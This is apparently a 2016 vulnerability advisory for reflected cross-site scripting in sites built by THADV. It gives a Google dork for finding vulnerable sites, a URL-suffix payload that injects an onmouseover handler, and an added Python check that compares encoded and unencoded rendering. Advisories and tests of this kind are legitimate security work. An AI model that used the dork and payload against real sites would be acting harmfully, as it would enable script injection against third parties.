|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: Design by THADV Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://thadv.com/
|[+]
|[+] Google Dork: intext:"Design by THADV" inurl:mobile/index.php
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 2016 23 January
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search the dork, choose a target, then add "%F6%22%20onmouseover=prompt%28992148%29%20//" after the URL.
|[+] Now, moving the mouse over a link in the page shows the alert.
|--------------------------------------------------------------|
|[+] Examples :
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : modiret
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
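
The suffix in the Exploit step only has an effect if the page writes the request path into a link attribute without encoding the double quote. The following is an added example, not code from the advisory or the vendor: it assumes a hypothetical `<a href>` template (the function names are also hypothetical), renders the path with and without attribute encoding, and uses Python's HTML parser to check whether an event-handler attribute appears.

```python
# Added example: constructed template and request path, not the vendor's code.
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

# Constructed request path carrying the suffix quoted in the advisory.
REQUEST_PATH = "/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//"


def decode_path(raw_path: str) -> str:
    """Percent-decode; the lone 0xF6 byte is not valid UTF-8, so replace it."""
    return unquote_to_bytes(raw_path).decode("utf-8", errors="replace")


def render_unsafe(raw_path: str) -> str:
    """Assumed flaw: the request path is echoed into href without encoding."""
    return '<a href="' + decode_path(raw_path) + '">Home</a>'


def render_safe(raw_path: str) -> str:
    """Same template, with the value HTML-attribute-encoded (quotes included)."""
    return '<a href="' + escape(decode_path(raw_path), quote=True) + '">Home</a>'


class AttrCollector(HTMLParser):
    """Records the attribute names of every start tag."""

    def __init__(self):
        super().__init__()
        self.attr_names = []

    def handle_starttag(self, tag, attrs):
        self.attr_names.extend(name for name, _ in attrs)


def injected_handlers(markup: str) -> list:
    """Return on* attributes present in markup; the template itself has none."""
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return [n for n in parser.attr_names if n.startswith("on")]


if __name__ == "__main__":
    print(injected_handlers(render_unsafe(REQUEST_PATH)))
    print(injected_handlers(render_safe(REQUEST_PATH)))
```

The same parser check can serve as a regression test for any template that reflects part of the request URL into an attribute.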